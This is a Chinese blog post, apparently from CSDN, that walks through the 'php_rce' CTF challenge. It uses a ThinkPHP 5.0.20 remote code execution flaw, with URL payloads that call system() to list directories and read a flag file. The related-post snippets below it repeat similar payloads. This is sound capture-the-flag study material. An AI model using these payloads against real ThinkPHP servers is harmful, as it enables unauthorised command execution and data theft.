web_进阶_php_rce

最新推荐文章于 2024-10-13 10:32:12 发布
最新推荐文章于 2024-10-13 10:32:12 发布
阅读量126 收藏
点赞数
分类专栏: ctf-web刷题之旅
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JURUO222/article/details/107858010
版权

参考的wp


网上很容易搜到thinkphp的payload,然后查询flag,拉到页面底部,看到ThinkPHP的版本是5.0.20:
回到CTF的这道题,应该考的就是这个命令执行的漏洞,执行ls命令
s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

返回如下,再把index.php和router.php打开看了一下,木有发现flag,再把request和response也检查了下,也木有flag。。

再逐级查看上级目录,最终看到一个名为flag的文件:
s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20…/…/…/flag

成功找到flag

Diana_1
关注
专栏目录
【攻防世界 XCTF】 WEB 高手进阶 php_rce ——最全面、最直观的WP
algae
05-04 714
攻防世界web高手进阶php_rce,php_rce 攻防世界xctf web
weixin_39603613的博客
03-09 289
php_rce首先了解ThinkPHP5.x rec 漏洞分析与复现https://blog.csdn.net/qq_40884727/article/details/101452478var_pathinfo的默认配置为s,我们可以通过$_GET[‘s’]来传参于是构造payloadhttp://111.198.29.45:30600/index.php?s=index/\think\App/i...
攻防世界web高手进阶php_rce,XCTF攻防世界_Web进阶区001
weixin_39599654的博客
03-09 775
XCTF攻防世界_Web进阶区001XCTF攻防世界_Web进阶区001XCTF_Web_高手进阶区baby_webTraining-WWW-RobotsWeb_php_unserializephp_rcebaby_web(1)按照提示,初始界面想到index.php,再次请求index.php后仍是1.php(被重定向了)。F12打开开发者模式查看“网络”模块,查看返回包发现确实有index.p...
攻防世界web高手进阶php_rce,攻防世界_web高手进阶_Training-WWW-Robots、php_rce
weixin_39530647的博客
03-09 83
Training-WWW-Robotsrobots协议是Python爬虫时涉及到的一个协议,在URL后直接加上/robots.txt,显示如下图: 然后如图所示把/robots.txt改成/f10g.php后得到flag:cyberpeace{dc7c764839800a9e351c917915b1e03e}php_rce 根据题目的writeup: 百度后可知5.1版本的thinkPHP漏洞为 ...
攻防世界WebWeb_php_unserialize、php_rceWeb_php_include”题解
qq_53325209的博客
04-06 2859
攻防世界高手进阶WebWeb_php_unserialize、php_rceWeb_php_include”题解。
攻防世界17-php_rce-CTFWeb进阶
最新发布
LH1013886337的博客
10-13 332
这题没什么头绪,还以为是个广告,提到了ThinkPHPV5,和phprce,可以去查一下找到了一些帖子,看一下。
攻防世界web高手进阶php_rce,CTF-攻防世界-web-php_rce(ThinkPHP远程代码执行)
weixin_39637924的博客
03-09 409
题目今天做CTF的时候,遇到下面这道题,看上去应该跟ThinkPHP版本5的相关漏洞。之前听过ThinkPHP有漏洞,具体情况不清楚。。。 解题过程去vulhub上搜了下ThinkPHP,还真有,把docker容器打开看了下,页面一摸一样哈哈: 这是一个远程代码执行漏洞,先学习vulhub复现这个漏洞的过程:输入:http://your-ip:8080/index.php?s=/Inde...
攻防世界web高手进阶php_rce,攻防世界 web高手进阶区 1-5 2020.6.11
weixin_35962351的博客
03-09 337
前言继续ctf的旅程攻防世界web高手进阶区的1-5题1、baby_web进去是个1.php页面里只有helloworld按题意是说想看初始网页猜测有index.php结果直接跳转到1.php查看源码在index的请求头里发现flag2、Training-WWW-Robots这题不就是个robots嘛没什么好说的了进入robots.txt发现php进入php发现flag3、Web_python_t...
攻防世界web高手进阶php_rce,[CTF]攻防世界web高手进阶区Writeup(更行ing)
weixin_42531396的博客
03-09 170
baby_webEMMMM,这就是一个签到题~解题方法:F12→Networks→刷新抓包→完成Training-WWW-Robots看题目可以知道这道题考的是爬虫协议(robots.txt文件)的知识打开网页,果然~他在网页里还暗示了一下,Sometimes these files reveal the directory structure instead protecting the con...
web_study:我在web_study上的n00b笔记
04-28
进阶:Fuel CMS ASP.NET和C# •初学者:SimpleWebAppMVC •中:Reddnet NodeJS •初学者:员工数据库 •中:JS RealWorld示例应用程序Java •初学者:Java Web App –逐步 •高级:GeoStore Atmail邮件...
攻防世界 web进阶 php_rce 【远程命令执行 thinkphp5 rce漏洞】
Hrain7的博客
11-15 940
是远程命令执行 thinkphp5 rec漏洞 具体执行语句可参考大佬的博客 ThinkPHP 5.x远程命令执行漏洞分析与复现 - 渗透测试中心 - 博客园 其实就在网上搜一下thinkphp5 rec漏洞 改一下payload 就行 ...
XCTF-WEB进阶php_rce
Lorezon的博客
03-15 318
打开题目出现网页: 在网上查了TinkPHP的漏洞复现,得到payload如下: ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27 漏洞复现具体...
【攻防世界-Web进阶篇-007php_rce
gyy990526的博客
03-14 2301
解:打开靶机提示了是ThinkPHP V5的远程代码执行漏洞,V5.0、V5.1均有此问题 构造payload,查看目录 payload:/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls 用ls /flag和find / -name'flag'效果一样都可以找到flag文件 payload:/?s=index/think\app/
[攻防世界web]shrine
JURUO222的博客
07-31 460
参考文章1 参考文章2 SSTI(服务器模板注入) sql注入是从用户获得一个输入,然后又后端脚本语言进行数据库查询,所以可以利用输入来拼接我们想要的sql语句,当然现在的sql注入防范做得已经很好了,然而随之而来的是更多的漏洞。 SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对python、php、java的一些网站处理框架,比如Python的jinja2 mako tornad
web_进阶_Web_python_template_injection
JURUO222的博客
08-08 375
参考文章 #flask模板注入 flask的渲染方法有render_template和render_template_string两种。 render_template()是用来渲染一个指定的文件的。使用如下 return render_template(‘index.html’) render_template_string则是用来渲染一个字符串的。SSTI与这个方法密不可分。 使用方法如下 html = ‘This is index page’ return render_template_strin
web_进阶_NewsCenter
JURUO222的博客
08-07 354
可以通过sqlmap来爆破 在框中随便输入一个test,然后用burp抓包 将抓到的数据保存在1.txt里,用sqlmap进行爆破 Python sqlmap.py -r 1.txt --dbs 爆出数据库名 继续查询数据库news Python  sqlmap.py -r 1.txt -D news --dump ...
HCTF2018-admin
JURUO222的博客
04-02 329
参考大佬博客 这道题叫admin,一进去有登录和注册选项,可能是在暗示用admin登录 随便注册一个登录 发现源码 andmin登录成功便可获得flag flask session 伪造 flask数据库操作的框架,就只能将session存储在cookie中。因为cookie实际上是存储在客户端(浏览器)中的,所以称之为“客户端session”。 flask 新建了URLSafeTimed...
sqli-labs闯关1—5(复习hhhh)
JURUO222的博客
08-07 306
参考:http://www.secist.com/archives/4880.html #SQL注入简介 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。(百度百科) ####补充知识 MySql常用注释方法:/ #(即%23) – /…/ --+ 验证有多少列:用order by 判断字段数
攻防世界php_rce
08-26
- *1* *2* *3* [攻防世界-web篇(php_rce)详解](https://blog.csdn.net/qq_54803507/article/details/127041653)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值